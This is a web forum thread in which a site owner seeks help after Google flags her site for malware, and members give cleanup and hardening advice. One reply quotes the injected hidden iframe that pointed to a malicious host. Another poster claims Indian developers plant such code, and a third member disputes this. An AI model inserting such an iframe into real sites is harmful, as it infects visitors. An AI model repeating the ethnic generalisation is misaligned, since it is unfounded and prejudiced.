Google Malware notification

[Lydia]

Hi All,

I was wondering if anyone could offer me some advise on this problem. Early this week we received a email from Google informing us that our web site is infected with malicious software. This has happened before and we made some changes to the source code which seemed to fix the problem. However the problem has arisen once again. I will post the email from Google in this thread. I am no expert on this kind of thing but I can tell anyone willing to help that we have contacted our server and they said the problem is not with them. Also our page was designed in India and the designers are of no help. We have also ran a virus scan and nothing has come up. I would appreciate any help you can offer or even if you can point me in the right direction. Below is a copy of the Google email and our web site.

Thanks in advance!
P.S I had to remove some URL's in order for me to be allowed to post the thread.

Dear site owner or webmaster of data-call. org,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

data-call .org data-call . org/



We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:


Once you've secured your site, you can request that the warning be removed
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

​

 

[php.allstar]

Hi,

Firefox displays a more detailed report when you try to access your site. (I always use and always recommend firefox for browsing as it actively alerts you before you view a site if it is dangerous.)

I've seen this in the past with Indian web developers. What they do is to embed an iframe in your source code.

In your case the code was:

!!!DO NOT VISIT THE BELOW URL!!!

<iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>

This was on line 15 of your source code. I advise that you edit the html file in question, to remove the iframe. Then I'd change all account passwords (FTP, Database, Control panel), I'd then run a virus scan on the box. If its on Linux i'd also check for rootkits.

Also please ensure that there are no gloabally writable folders (chmod 0777) if you are on linux.

If you're on a shared server, it may be the case that every acount on the box has been compromised, so you should follow up that with your hosting company.

This basically loads whatever viruses are on the iframe source site into your site, so your visitors maching gets infected.

I worked for a company in UCD in the past and we asked some Indian designers to provide a mockup of a design for our new site, to see if we wanted to go with them or not. Our boss was not happy with the design so he did not go with the Indian designers. I personally liked the design and went back to the link which they provided the mockup html on a few days later, only for Firefox to report the site as containing malicious code!

Word of advice, don't go to India for design or development for starters. There are plenty of people on this forum who might be willing to do some work on your site for you. Yes Indian companies are cheap and cheerful, there work can be fantastic at times, but when they get pissed, they will do this kind of thing to harm you!

Can you verify if you gave hosting access details to the indian company?

Again, thats not saying that this was definitely caused by the indian company you hired. It could be a script kiddie somewhere, or your box could be compromised.

 

[php.allstar]

Hi All,

We have also ran a virus scan and nothing has come up.

Did you run the virus scan on your own computers or on the actual web server where the website is hosted?!

 

[cgarvey]

Word of advice, don't go to India for design or development for starters.

Generalise / over-generalise much? Especially based on the one experience you mention?

Apart from that, good advice!

Lydia, 3 possibilities I can think of, off hand.

1) You are using a CMS that is out of date. In which case you need to fix this (rather than just remove the malicious code) to prevent further occurrences.
2) You have a weak / easily-guessed password on your hosting account
3) You have global write permissions set, or your hosting company has inadequate security, so that any user on the server your website is on can inject this malicious code.

So, are you using a CMS? If so, what CMS and what version?

Do you want one of us here to take a look (will require user/password details, and a certain element of trust!)?

.cg

 

[php.allstar]

Generalise / over-generalise much? Especially based on the one experience you mention?

Jesus, thanks for making me sound border-line racist there cgarvey!

Look, I've nothing against Indians or any other nationality for that matter. I just get frustrated when people go to these places to look for deisgners and developers, when there is an abundant supply here in Ireland.

In most cases, its generally a budget issue. Although I do submit to the fact that it could also be a work quality/portfolio strength issue!

 

[cgarvey]

No racial slant intended (or interpreted in your original post), relax!

There are a number of Indian agencies who deliver high-quality output at a very reasonable price. Your original assertion that they'll turn nasty on you was unfair. Anyway, enough of a side track!

.cg

 

[Lydia]

Hi guys,
Wow, That’s what I call serviceJ. Thanks for responding so quickly. Firstly, we did give the developers the passwords and yes we are on lynux. We’re deleting the code now and taking the steps outlined by PHP.Allstar.
CGarvey: Thank you for the offer of taking a look. My boss is going to do what he can and if that fails we may take you up on your offer if that suits you? I am not sure what CMS we are using but I will find out. Can you recommend what we should be using?
I’ll update the thread with our results. Thanks again for your help!
Lydia…
P.S. We ran a virus scan on our own computers and not on the web server where the website is hosted

 

[cgarvey]

I am not sure what CMS we are using but I will find out. Can you recommend what we should be using?[/COLOR]

No recommendation, other than not to be thinking about moving CMS unless you have to (you have bigger issues!!)

If I'm online at the time, I'll help if I can.

 

[php.allstar]

Hi, you're welcome.

CGarvey, I was joking. I was just giving a real world example from my personal experiences.

Lydia, running a virus scan on your computer would not be likely to point out your website as being infected.

You woukld have to run a virus scan on your website. As you are on linux, I suggest running chkrootkit from the shell.

If you are on a shared account, I would advise you tell your host about exactly what happened, there may be consequences to other accounts on the box if the server is not set up properly by them. Whoever inserted the malicious code could have also dropped a rootkit into a folder on your site, which could lead to the whole box becomming vulnerable/infected.

 

[Lydia]

Thanks PHP,

I'll pass on the advise. I think we may be on a shared account so better safe than sorry I guess.